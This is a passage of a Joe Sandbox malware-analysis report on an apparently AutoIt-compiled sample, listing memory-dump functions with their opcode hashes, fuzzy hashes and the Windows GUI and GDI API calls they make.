                      • Instruction Fuzzy Hash: 11822E76B083108BD748DF19D89075EF7E2ABCC314F1A893DA999E3354DA74EC118B86
                      Function 02F900D9 Relevance: .6, Instructions: 637COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d484360baca387ed210fec8dfc27e51abafa6055dc11993d3e7389e0d21fed99
                      • Instruction ID: ed82df40e5e1e3004e6f239fcbca5e80aacadfe4321167ebeccb619d0649372c
                      • Opcode Fuzzy Hash: d484360baca387ed210fec8dfc27e51abafa6055dc11993d3e7389e0d21fed99
                      • Instruction Fuzzy Hash: 31320372E69F054DEB239534C862335A298AFA73D4F15DB3BE81AB5E95EF29C4C34100
                      Function 00418808 Relevance: .6, Instructions: 590COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                      • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                      • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                      • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                      Function 004221C5 Relevance: .3, Instructions: 345COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                      Function 02F551EE Relevance: .3, Instructions: 344COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                      • Instruction ID: 1e6393b7c6c917a94c60ba3f99a5345e8d070619e53841840d6eb01c6502c9c0
                      • Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                      • Instruction Fuzzy Hash: C3D17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
                      Function 004225FA Relevance: .3, Instructions: 341COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                      Function 02F56EAF Relevance: .2, Instructions: 230COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                      • Instruction ID: eae2d87858db8d67741bcac4334bf4b2478b291ef2e873235c532df13f719796
                      • Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                      • Instruction Fuzzy Hash: EDA1A3B29093109FD344CF1AD88055BBBE2BFC8614F5AC96EF89897315D730E9458F8A
                      Function 02F85980 Relevance: .2, Instructions: 188COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                      • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                      • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                      • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                      Function 02F57F80 Relevance: .2, Instructions: 186COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c03b53c843f32655ce7c01de855773bc17e6d6c5a5574746a31738594e369466
                      • Instruction ID: 7e674f36fe7486cb7e810b828e0c9645e3f0073cfdd22b74e9d637e143a3f5d6
                      • Opcode Fuzzy Hash: c03b53c843f32655ce7c01de855773bc17e6d6c5a5574746a31738594e369466
                      • Instruction Fuzzy Hash: 8B61F035D287A84BC312AF3AE84167AF394FFD63C4F54CB3EEB8162A80DB2411568744
                      Function 0056C594 Relevance: .1, Instructions: 134COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                      • Instruction ID: 9ca45030816374493ad504bef7778a68cc74dc5459e378cd5d504e344b198e9f
                      • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                      • Instruction Fuzzy Hash: 4C314A32A063845BCF328A6DDC146B57F64BB77775F1D51A7E4C28B192C221AC40C669
                      Function 02F57B71 Relevance: .1, Instructions: 123COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6e55198542b9b6d48fc5373fb7cf431a3100c575db6f33b4a531cd8a78ef662
                      • Instruction ID: a89c55fefa96ece3586a91e013cac051afce40eb8071b07a9308262925ccbd5f
                      • Opcode Fuzzy Hash: a6e55198542b9b6d48fc5373fb7cf431a3100c575db6f33b4a531cd8a78ef662
                      • Instruction Fuzzy Hash: 5641C2316083658FC728EE29E8E067BB3D1FBC9385F55493EDB8683280CB386415CB51
                      Function 02F83780 Relevance: .1, Instructions: 105COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                      • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                      • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                      • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                      Function 02F8D580 Relevance: .1, Instructions: 100COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                      • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                      • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                      • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                      Function 00BA55E8 Relevance: .1, Instructions: 92COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                      • Instruction ID: b10a2cddf9c39ff22a94a93b308bef0bfc89e14271e0e68f207c5a23af89bcf9
                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                      • Instruction Fuzzy Hash: C241A471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB50
                      Function 00BA5478 Relevance: .0, Instructions: 35COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                      • Instruction ID: 95cad74881cade4d353a8574313e8e0349b6241e8696613a4f5c14afcfbe308a
                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                      • Instruction Fuzzy Hash: D2018C78A05609EFCB58DF98C5909AEF7F5FB88310F2085D9E819A7705D730AE81DB80
                      Function 00BA54D8 Relevance: .0, Instructions: 35COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                      • Instruction ID: 8f5c1e9491af51bc59b4c61b1586317655c23f885a1039194fd6c068fd9f28ee
                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                      • Instruction Fuzzy Hash: 91018078E14609EFCB54DF98C5909AEF7F6FB58310F208599E809A7701D730AE41DB80
                      Function 00BA3E58 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                      Function 02F51130 Relevance: .0, Instructions: 2COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                      • Instruction Fuzzy Hash:
                      Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                      • IsWindowVisible.USER32(?), ref: 0048364B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharUpperVisibleWindow
                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                      • API String ID: 4105515805-45149045
                      • Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                      • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                      • Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                      • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                      Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                      Download Yara Rule
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 0048A630
                      • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                      • GetSysColor.USER32(0000000F), ref: 0048A66D
                      • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                      • SelectObject.GDI32(?,00000000), ref: 0048A696
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                      • GetSysColor.USER32(00000010), ref: 0048A6C9
                      • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                      • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                      • DeleteObject.GDI32(00000000), ref: 0048A6E6
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                      • FillRect.USER32(?,?,00000000), ref: 0048A763
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                        • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                        • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                        • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                        • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                        • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                        • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                        • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                        • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                        • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                        • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                        • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                        • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                        • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                      • String ID:
                      • API String ID: 3521893082-0
                      • Opcode ID: deb33b71fda49ccf7e45a1d74aaf8aa8c22477eef8c960017b5c478ece92b36b
                      • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                      • Opcode Fuzzy Hash: deb33b71fda49ccf7e45a1d74aaf8aa8c22477eef8c960017b5c478ece92b36b
                      • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                      Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                      • DeleteObject.GDI32(00000000), ref: 00402CE8
                      • DeleteObject.GDI32(00000000), ref: 00402CF3
                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                        • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                      • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                      • String ID: 0
                      • API String ID: 464785882-4108050209
                      • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                      • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                      • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                      • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                      Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 004774DE
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                      • GetClientRect.USER32(00000000,?), ref: 0047763F
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                      • GetStockObject.GDI32(00000011), ref: 004776A2
                      • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                      • DeleteDC.GDI32(00000000), ref: 004776C8
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                      • GetStockObject.GDI32(00000011), ref: 004777A6
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
